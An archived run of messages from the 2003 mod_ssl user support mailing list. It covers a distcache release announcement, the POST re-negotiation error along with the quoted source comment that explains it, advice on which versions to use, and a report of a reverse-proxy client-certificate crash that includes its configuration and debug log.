AQEFBQAwgbwxCzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1i
dXJnMTowOAYDVQQKEzFUQyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3
b3JrcyBHbWJIMSIwIAYDVQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZI
hvcNAQkBFhpjZXJ0aWZpY2F0ZUB0cnVzdGNlbnRlci5kZTAeFw0wMzAyMTAxNDQyNTBaFw0w
NDAyMTAxNDQyNTBaMIGqMQswCQYDVQQGEwJERTEQMA4GA1UECBMHSGFtYnVyZzEQMA4GA1UE
BxMHSGFtYnVyZzEaMBgGA1UEChMRVEMgVHJ1c3RDZW50ZXIgQUcxFDASBgNVBAsTC0VudHdp
Y2tsdW5nMRowGAYDVQQDExFHb2V0eiBCYWJpbi1FYmVsbDEpMCcGCSqGSIb3DQEJARYaYmFi
aW4tZWJlbGxAdHJ1c3RjZW50ZXIuZGUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQCwemnTehAoa6QG0+SldXHkUSAwKBp89oLAaBSNgcCS0vkabiGX3STnqZuHK4N1+i16zCsE
hf5bIRXh61T7S82m4CxshUro7CT9M97u3+FzWAhh5eFG8j5GG6CD/Rgvw0bbJJztWHyVMv+M
igRuFYyeAD+r2UxEHsuo5sXpbCtnpOL8EX1I7P8/VHGZrY+IqYhz+iKhcsnQ0y2q59Y1h1Lt
sxZyc68mepl3TlD4oQjhRg/nNShZLGdVbHIA6SsoE0HCIP1SLZm3hZITo/SJG6DsolSr734b
o5cZnZvQArdtjIzKwdEQG/U0dQ4F5cqH8MpCgCvhjPArvI3CmiY734WjAgMBAAGjgdMwgdAw
DAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCBeAwPgYJYIZIAYb4QgEIBDEWL2h0dHA6Ly93
d3cudHJ1c3RjZW50ZXIuZGUvZ3VpZGVsaW5lcy9pbmRleC5odG1sMBEGCWCGSAGG+EIBAQQE
AwIFoDBdBglghkgBhvhCAQMEUBZOaHR0cHM6Ly93d3cudHJ1c3RjZW50ZXIuZGUvY2dpLWJp
bi9jaGVjay1yZXYuY2dpLzkwMUUwMDAwMDAwMjRFNDJFRDIzMTIwN0Y3QTU/MA0GCSqGSIb3
DQEBBQUAA4GBADmzsLghRtB5lbwpvJZaSd6rAarWYBclE9MLs/CRugmYx5+ZcLzoPvJvIbiq
xOaBhECKPRMC3BSwzVbMQQosI19o7lNyUJdh7NrJlMh5DqoPltAjnrUafj3AwJOIZNDLYeQN
2w8txa88oW46WIwGU757GPfkGJiZuXBlgSSvSO5CMYIEdzCCBHMCAQEwgdAwgbwxCzAJBgNV
BAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFU
QyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYD
VQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZp
Y2F0ZUB0cnVzdGNlbnRlci5kZQIPAJAeAAAAAk5C7SMSB/elMAkGBSsOAwIaBQCgggJ7MBgG
CSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAzMDMyMTIwMDUyMlow
IwYJKoZIhvcNAQkEMRYEFMAMMYbyWx9zpzdghXml8nDNzhyjMFIGCSqGSIb3DQEJDzFFMEMw
CgYIKoZIhvcNAwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0G
CCqGSIb3DQMCAgEoMIHhBgkrBgEEAYI3EAQxgdMwgdAwgbwxCzAJBgNVBAYTAkRFMRAwDgYD
VQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFUQyBUcnVzdENlbnRl
ciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYDVQQLExlUQyBUcnVz
dENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZpY2F0ZUB0cnVzdGNl
bnRlci5kZQIPAJAeAAAAAk5C7SMSB/elMIHjBgsqhkiG9w0BCRACCzGB06CB0DCBvDELMAkG
A1UEBhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoT
MVRDIFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAg
BgNVBAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRp
ZmljYXRlQHRydXN0Y2VudGVyLmRlAg8AkB4AAAACTkLtIxIH96UwDQYJKoZIhvcNAQEBBQAE
ggEAZdccyxabkDy3G2Jjpyk7Mv92WYMnOfXsTQUp11wDt5cEvDbJu0RGxrykgsnE3jgFi/x9
nZguaLkLY0FzdLiaEe6b1Ydom/LgINvTw8tbuGfo/BPK2pp3E1zuHyJrguOkAEy03hQYOAMZ
ZcXFPF14AkB+UunnHvzUgZ0AUCudHMarzJ1Z1BDmWKM1YfPlqauhz4mRqH2Azf28j3g+8hHu
iqic8Hf5TTJ+HUGthiFg11VD1iIG7OYD4Sv9jv3IBKYdtOfTlYQI0dy5ojsK37CZCMt3m1eM
OWWCj/mrfFBD5Af2DnMsVNrtJPOg3t7IvQrxz+O5+GLxhkejREb/hlpQWQAAAAAAAA==
--------------ms070306000100030607000403--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 24 04:01:38 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 59E002AA030; Mon, 24 Mar 2003 04:01:38 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from VL-MS-MR001.sc1.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id 5FD602AA015
	for ; Mon, 24 Mar 2003 04:01:32 +0100 (CET)
Received: from steerpike.geoffthorpe.net ([24.202.231.211])
 by VL-MS-MR001.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 1.10 (built Jan 23 2003))
 with SMTP id <0HC8004BYGCPJF@VL-MS-MR001.sc1.videotron.ca> for
 modssl-users@modssl.org; Sun, 23 Mar 2003 22:00:26 -0500 (EST)
Received: by steerpike.geoffthorpe.net (sSMTP sendmail emulation); Sun,
 23 Mar 2003 22:00:05 -0500
Date: Sun, 23 Mar 2003 22:00:05 -0500
From: Geoff Thorpe 
Subject: [ANNOUNCE] distcache 0.4pre2
To: Modssl Users List 
Message-id: <20030324030005.GB2841@grumpy.geoffnet>
X-Info: http://www.geoffthorpe.net
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
Content-disposition: inline
User-Agent: Mutt/1.4i
X-Editor: Vim http://www.vim.org/
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

Once again, I spare you a large ASCII-art ANNOUNCE file - you can find
one if you surf directly to the latest distcache release notes at;

   http://sourceforge.net/project/shownotes.php?release_id=148225

The new distcache 0.4pre2 release is closer still to an eventual
"stable" release but it *needs* more testing and feedback from users -
so if you are investigating session caching possibilities, please check
it out - you may be pleasantly surprised. To give you an idea just with
respect to performance; it'll probably give shmcb a run for its money,
should thrash shmht completely, and unlike either of them, it allows you
to share a session cache between multiple machines.

There's also a newer support package for mod_ssl 2.8.14, and the Apache
2 support was updated a little while ago too with the release of version
2.0.44-2.

So there it is - if you're still reading and still interested, please
take a surf to;

   http://www.distcache.org/

Oh, and download something, try it out, and mail the distcache-users
list with any comments, complaints, compliments, or questions.

Regards,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 24 16:23:34 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 442452AA033; Mon, 24 Mar 2003 16:23:34 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns.eer.ee (ns.eer.ee [195.80.103.28])
	by master.modssl.org (Postfix) with ESMTP id 28A072AA019
	for ; Mon, 24 Mar 2003 16:23:32 +0100 (CET)
Received: from fw.eer.ee (dmz.eer.ee [195.80.103.25])
	by ns.eer.ee (8.11.6/8.11.6/SuSE Linux 0.5) with SMTP id h2OABXx09877
	for ; Mon, 24 Mar 2003 12:11:33 +0200
Received: Stripped by FW
Received: Stripped by FW
Message-ID: <000f01c2f1e5$483d0ac0$021064ac@erkik>
From: "Erki Kriks" 
To: 
References: <20030321151548.10193.qmail@web40301.mail.yahoo.com>
Subject: POST method not allowed
Date: Mon, 24 Mar 2003 11:10:54 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="ISO-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Erki Kriks" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi!

I'm using Apache 3.2.1, tomcat and mod_ssl 2.8.11.
When i'm using HTTPS with GET method then everything OK.
But when i try HTTPS with POST method then i get error:
"mod_ssl: SSL Re-negotiation in conjunction with POST method not supported!"
Can anybody explain what's missing or i suppose something is missing in
tomcat web.xml?

Thanx,
Erki

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 24 20:39:46 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6ABDF2AA033; Mon, 24 Mar 2003 20:39:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp.shiva.com (g26-226.citenet.net [205.151.202.226])
	by master.modssl.org (Postfix) with ESMTP id 056E32AA019
	for ; Mon, 24 Mar 2003 20:39:45 +0100 (CET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: where is the mod_ssl bug database?
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Date: Mon, 24 Mar 2003 14:39:44 -0500
Message-ID: <7361A14349C1244D83FE6266B0463A1F04E29F@shivayexch.shiva.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: where is the mod_ssl bug database?
Thread-Index: AcLyPR7nc9+PYxYESoq6HG1Dz2Q5Ww==
From: "Gaetan Hache" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gaetan Hache" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello !

Where can I find the mod_ssl bug database?
The link http://www.modssl.org/support/bugdb/
doesn't seem to work.

In fact, what I'm looking for is more info on the bugs 534 & 569 and the =
patch in=20
http://www.mail-archive.com/modssl-users@modssl.org/msg12051.html.
Did the patch was applied in a official release of mod_ssl?
If not, should it be applied?


Regards,

Ga=E9tan Hach=E9
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 25 04:50:13 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BB6E42AA033; Tue, 25 Mar 2003 04:50:13 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web41504.mail.yahoo.com (web41504.mail.yahoo.com [66.218.93.87])
	by master.modssl.org (Postfix) with SMTP id 0C9382AA01A
	for ; Tue, 25 Mar 2003 04:50:10 +0100 (CET)
Message-ID: <20030325035008.9381.qmail@web41504.mail.yahoo.com>
Received: from [130.86.72.20] by web41504.mail.yahoo.com via HTTP; Mon, 24 Mar 2003 19:50:08 PST
Date: Mon, 24 Mar 2003 19:50:08 -0800 (PST)
From: kulkarni veena 
Subject: Versions of openssl and modssl to be used.
To: modssl-users@modssl.org, users@httpd.apache.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kulkarni veena 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I would like to know the correct versions of OpenSSL
and ModSSL to be used with Apache 1.3.22 on SunOS
operating system.

Thanks in advance.

Veena 

__________________________________________________
Do you Yahoo!?
Yahoo! Platinum - Watch CBS' NCAA March Madness, live on your desktop!
http://platinum.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 25 08:10:09 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 82A2E2AA033; Tue, 25 Mar 2003 08:10:09 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from neptun.sns-felb.debis.de (neptun.sns-felb.debis.de [53.122.101.2])
	by master.modssl.org (Postfix) with SMTP id 575172AA01A
	for ; Tue, 25 Mar 2003 08:10:08 +0100 (CET)
Received: by neptun.sns-felb.debis.de; id IAA16474; Tue, 25 Mar 2003 08:10:05 +0100
Received: from unknown(53.113.82.10) by neptun.sns-felb.debis.de via smap (V5.0)
	id xma016407; Tue, 25 Mar 03 08:09:57 +0100
Received: from mail1.c1.dsh.de (localhost [127.0.0.1])
	by dshmail1.dsh.de (8.9.1/8.8.7) with ESMTP id IAA21067
	for ; Tue, 25 Mar 2003 08:06:04 +0100 (MET)
Received: from t-systems.com (lpzpc326.clients.win.c1.dsh.de [172.20.16.226])
	by mail1.c1.dsh.de (8.10.0/8.10.0) with ESMTP id h2P79uM17194
	for ; Tue, 25 Mar 2003 08:09:56 +0100
Message-ID: <3E8000C8.9040202@t-systems.com>
Date: Tue, 25 Mar 2003 08:10:00 +0100
From: Dimitri Rebrikov 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020623 Debian/1.0.0-0.woody.1
X-Accept-Language: de-de, en-us, ru
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: POST method not allowed
References: <20030321151548.10193.qmail@web40301.mail.yahoo.com> <000f01c2f1e5$483d0ac0$021064ac@erkik>
X-Enigmail-Version: 0.63.3.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dimitri Rebrikov 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Erki Kriks wrote:
> Hi!
> 
> I'm using Apache 3.2.1, tomcat and mod_ssl 2.8.11.
> When i'm using HTTPS with GET method then everything OK.
> But when i try HTTPS with POST method then i get error:
> "mod_ssl: SSL Re-negotiation in conjunction with POST method not supported!"
> Can anybody explain what's missing or i suppose something is missing in
> tomcat web.xml?
> 
> Thanx,
> Erki
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

Hi,
you probably compiled your mod_ssl with SSL_CONSERVATIVE turned on.
Here is a code-snip from ssl_engine_io.c with description about
issues with re-negotiation during the POST-Request.

Regards

------------------------------snip---------------------------------------

/*  _________________________________________________________________
**
**  I/O Request Body Sucking and Re-Injection
**  _________________________________________________________________
*/

#ifndef SSL_CONSERVATIVE

/*
  * Background:
  *
  * 1. When the client sends a HTTP/HTTPS request, Apache's core code
  * reads only the request line ("METHOD /path HTTP/x.y") and the
  * attached MIME headers ("Foo: bar") up to the terminating line ("CR
  * LF"). An attached request body (for instance the data of a POST
  * method) is _NOT_ read. Instead it is read by mod_cgi's content
  * handler and directly passed to the CGI script.
  *
  * 2. mod_ssl supports per-directory re-configuration of SSL parameters.
  * This is implemented by performing an SSL renegotiation of the
  * re-configured parameters after the request is read, but before the
  * response is sent. In more detail: the renegotiation happens after the
  * request line and MIME headers were read, but _before_ the attached
  * request body is read. The reason simply is that in the HTTP protocol
  * usually there is no acknowledgment step between the headers and the
  * body (there is the 100-continue feature and the chunking facility
  * only), so Apache has no API hook for this step.
  *
  * 3. the problem now occurs when the client sends a POST request for
  * URL /foo via HTTPS the server and the server has SSL parameters
  * re-configured on a per-URL basis for /foo. Then mod_ssl has to
  * perform an SSL renegotiation after the request was read and before
  * the response is sent. But the problem is the pending POST body data
  * in the receive buffer of SSL (which Apache still has not read - it's
  * pending until mod_cgi sucks it in). When mod_ssl now tries to perform
  * the renegotiation the pending data leads to an I/O error.
  *
  * Solution Idea:
  *
  * There are only two solutions: Either to simply state that POST
  * requests to URLs with SSL re-configurations are not allowed, or to
  * renegotiate really after the _complete_ request (i.e. including
  * the POST body) was read. Obviously the latter would be preferred,
  * but it cannot be done easily inside Apache, because as already
  * mentioned, there is no API step between the body reading and the body
  * processing. And even when we mod_ssl would hook directly into the
  * loop of mod_cgi, we wouldn't solve the problem for other handlers, of
  * course. So the only general solution is to suck in the pending data
  * of the request body from the OpenSSL BIO into the Apache BUFF. Then
  * the renegotiation can be done and after this step Apache can proceed
  * processing the request as before.
  *
  * Solution Implementation:
  *
  * We cannot simply suck in the data via an SSL_read-based loop because of
  * HTTP chunking. Instead we _have_ to use the Apache API for this step which
  * is aware of HTTP chunking. So the trick is to suck in the pending request
  * data via the Apache API (which uses Apache's BUFF code and in the
  * background mod_ssl's I/O glue code) and re-inject it later into the Apache
  * BUFF code again. This way the data flows twice through the Apache BUFF, of
  * course. But this way the solution doesn't depend on any Apache specifics
  * and is fully transparent to Apache modules.
  */

-------------------------------snip--------------------------------------------


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 25 09:17:41 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 11A5B2AA033; Tue, 25 Mar 2003 09:17:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from tomts16-srv.bellnexxia.net (tomts16.bellnexxia.net [209.226.175.4])
	by master.modssl.org (Postfix) with ESMTP id 5913A2AA01A
	for ; Tue, 25 Mar 2003 09:17:39 +0100 (CET)
Received: from localhost.localdomain ([64.231.120.47])
          by tomts16-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20030325081738.OJW14169.tomts16-srv.bellnexxia.net@localhost.localdomain>;
          Tue, 25 Mar 2003 03:17:38 -0500
Subject: Re: Versions of openssl and modssl to be used.
From: hunter 
To: modssl-users@modssl.org
Cc: users@httpd.apache.org
In-Reply-To: <20030325035008.9381.qmail@web41504.mail.yahoo.com>
References: <20030325035008.9381.qmail@web41504.mail.yahoo.com>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.5 
Date: 25 Mar 2003 03:17:38 -0500
Message-Id: <1048580258.398.2.camel@ptak>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, 2003-03-24 at 22:50, kulkarni veena wrote:
> Hi,
> 
> I would like to know the correct versions of OpenSSL
> and ModSSL to be used with Apache 1.3.22 on SunOS
> operating system.
> 
> Thanks in advance.
> 
> Veena 
> 
> __________________________________________________
> Do you Yahoo!?
> Yahoo! Platinum - Watch CBS' NCAA March Madness, live on your desktop!
> http://platinum.yahoo.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

Veena,

This does not directly address your question... sorry.

But...

Using versions less than the most current involves a risk, since most of
the new versions contain security patches, not just enhancements.

The following are the latest version numbers. 

Apache 1.3.27
Mod_SSL 2.8.14
Openssl 0.9.7a

I would strongly advise that you not use Apache 1.3.22, but since I have
no experience with SunOS I do not know what issues may exist for the
latest Apache and your OS.

Perhaps someone with more experienced will comment as well. 

Chris



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 25 17:54:39 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 593FE2AA033; Tue, 25 Mar 2003 17:54:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relay.westlb.de (relay.westlb.de [195.27.219.2])
	by master.modssl.org (Postfix) with ESMTP id 3A3C22AA01A
	for ; Tue, 25 Mar 2003 17:54:38 +0100 (CET)
Received: from fw05a.westlb.sko.de (zizi.westlb.de [193.22.163.2])
	by relay.westlb.de (Postfix) with SMTP id 9DBB022806B
	for ; Tue, 25 Mar 2003 17:54:37 +0100 (CET)
Received: from ntsnotes0010019.zs.westlb.sko.de by fw05a.westlb.sko.de
          via smtpd (for relay.westlb.de [195.27.219.2]) with SMTP; 25 Mar 2003 16:54:37 UT
Subject: Problem with Reverse Proxy and Client authentication
To: modssl-users@modssl.org
Message-ID: 
From: IBM_fischers@wpsbank.de
Date: Tue, 25 Mar 2003 17:54:26 +0100
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: IBM_fischers@wpsbank.de
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



Hello,

we want to setup a reverse proxy (http in, https to the backend IBM HTT=
P
Server) with client authentication to the backend.
On Linux and WinNT 4 SP5 (with Apache 2.044 and OpenSSL 0.97) we are bo=
th
getting segmentation faults or exits (see below). We checked the
communication through openssl directly and it worked.

Anyone any hint, we are getting desperate? Thanks!

Our configuration:

SSLProxyEngine on
ProxyRequests On
ProxyVia On
SSLProxyMachineCertificateFile d:\apache\client_cert.pem
SSLProxyVerify optional_no_ca
SSLProxyVerifyDepth 10
SSLProxyCipherSuite ALL
ProxyPass /myapp https://backendserver/app
ProxyPassReverse /myapp/ https://backendserver/app/
...

Apache error_log from WinNT:
[Mon Mar 24 11:02:59 2003] [info] Server: Apache/2.0.44, Interface:
mod_ssl/2.0.44, Library: OpenSSL/0.9.7a
...
[Mon Mar 24 11:24:49 2003] [debug] ssl_engine_kernel.c(1236): Certifica=
te
Verification: Verifiable Issuer is configured as optional, therefore we=
're
accepting the certificate
[Mon Mar 24 11:24:49 2003] [debug] ssl_engine_kernel.c(1198): Certifica=
te
Verification: depth: 0, subject: /C=3DDE/ST=3DNRW/L=3DDuesseldorf/O=3DW=
estdeutsche
Landesbank-Girozentrale-Duesseldorf/Muenster/OU=3DWestLB Systems
GmbH/OU=3DTerms of use at www.verisign.com/rpa
(c)00/CN=3Dwpdirect.westlb.sko.de, issuer: /O=3DVeriSign Trust
Network/OU=3DVeriSign, Inc./OU=3DVeriSign International Server CA - Cla=
ss
3/OU=3Dwww.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign=

[Mon Mar 24 11:24:49 2003] [debug] ssl_engine_kernel.c(1236): Certifica=
te
Verification: Verifiable Issuer is configured as optional, therefore we=
're
accepting the certificate
[Mon Mar 24 11:24:49 2003] [debug] ssl_engine_kernel.c(1766): OpenSSL:
Loop: SSLv3 read server certificate A
[Mon Mar 24 11:24:49 2003] [debug] ssl_engine_kernel.c(1766): OpenSSL:
Loop: SSLv3 read server certificate request A
[Mon Mar 24 11:24:49 2003] [debug] ssl_engine_kernel.c(1766): OpenSSL:
Loop: SSLv3 read server done A
[Mon Mar 24 11:24:49 2003] [debug] ssl_engine_kernel.c(1532): Proxy cli=
ent
certificate callback: (localhost:443) entered
[Mon Mar 24 11:24:49 2003] [debug] ssl_engine_kernel.c(1504): Proxy cli=
ent
certificate callback: (localhost:443) found acceptable cert, sending
/C=3DDE/ST=3DNRW/L=3DDuesseldorf/O=3DWPS Bank AG/CN=3DMYCLIENT
[Mon Mar 24 11:24:51 2003] [notice] Parent: child process exited with
status 3221225477 -- Restarting.



Mit freundlichen Gr=FC=DFen
--
Steffen Fischer, I/T Architect
IBM Deutschland GmbH, Karl-Arnold-Platz 1a, D-40474 Duesseldorf
Tel: +49 (0) 211 476-2986 Fax: -2391 Mobile: +49 (0) 175 433 1187
email: steffen.fischer@de.ibm.com
project email: ibm_fischers@wpsbank.de
project phone: +49 (0) 211 826 - 74276

Diese Nachricht ist vertraulich. Sie ist ausschliesslich fuer
den im Adressfeld ausgewiesenen Adressaten bestimmt.
Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten
wir um eine kurze Nachricht. Jede unbefugte Weiterleitung
oder Fertigung einer Kopie ist unzulaessig. Da wir nicht die
Echtheit oder Vollstaendigkeit der in dieser Nachricht
enthaltenen Informationen garantieren koennen, schliessen wir
die rechtliche Verbindlichkeit der vorstehenden Erklaerungen
und Aeusserungen aus. Wir verweisen in diesem Zusammenhang
auch auf die  fuer die Bank geltenden Regelungen ueber die
Verbindlichkeit von Willenserklaerungen mit verpflichtendem
Inhalt, die in den bankueblichen Unterschriftenverzeichnissen
bekannt gemacht werden.

This message is confidential and may be privileged. It is
intended solely for the named  addressee. If you are not the
intended recipient please inform us. Any unauthorised
dissemination, distribution or copying hereof is prohibited.
As we cannot guarantee the  genuineness or completeness of
the information contained in this message, the statements
set forth above are not legally binding. In connection
therewith, we also refer to the governing regulations of
WestLB concerning signatory authority published in the
standard bank signature lists with regard to the legally
binding effect of statements made with the intent to
obligate WestLB.
=


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 27 01:28:54 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 91C202AA02E; Thu, 27 Mar 2003 01:28:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from tomts9-srv.bellnexxia.net (tomts9.bellnexxia.net [209.226.175.53])
	by master.modssl.org (Postfix) with ESMTP id A0D3E2AA01A
	for ; Thu, 27 Mar 2003 01:28:52 +0100 (CET)
Received: from localhost.localdomain ([64.231.120.47])
          by tomts9-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20030327002851.DJBW6561.tomts9-srv.bellnexxia.net@localhost.localdomain>;
          Wed, 26 Mar 2003 19:28:51 -0500
Subject: Re: 0.9.7a problems
From: hunter 
To: Edwin Cleton 
Cc: modssl-users@modssl.org, rse@engelschall.com
In-Reply-To: <615C87A879D8@diagram.nl>
References: <615C87A879D8@diagram.nl>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.5 
Date: 26 Mar 2003 19:28:50 -0500
Message-Id: <1048724931.398.79.camel@ptak>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, 2003-03-26 at 05:32, Edwin Cleton wrote:
> If you were a woman I'd kiss you! this works like before, no more crashes or errors like these:
> 
> [Tue Mar 25 15:37:01 2003] [error] mod_ssl: SSL handshake failed (server 10.1.1.28:443, client 10.1.1.28) (OpenSSL library error follows)
> [Tue Mar 25 15:37:01 2003] [error] OpenSSL: error:1408F455:SSL routines:SSL3_GET_RECORD:decryption failed or bad record mac
> 
> There is definately something wrong in openssl 0.9.7a, or, mod_ssl 2.8.14 is trying to call 0.9.6 functions which are different/don't exist in 0.9.7
> 
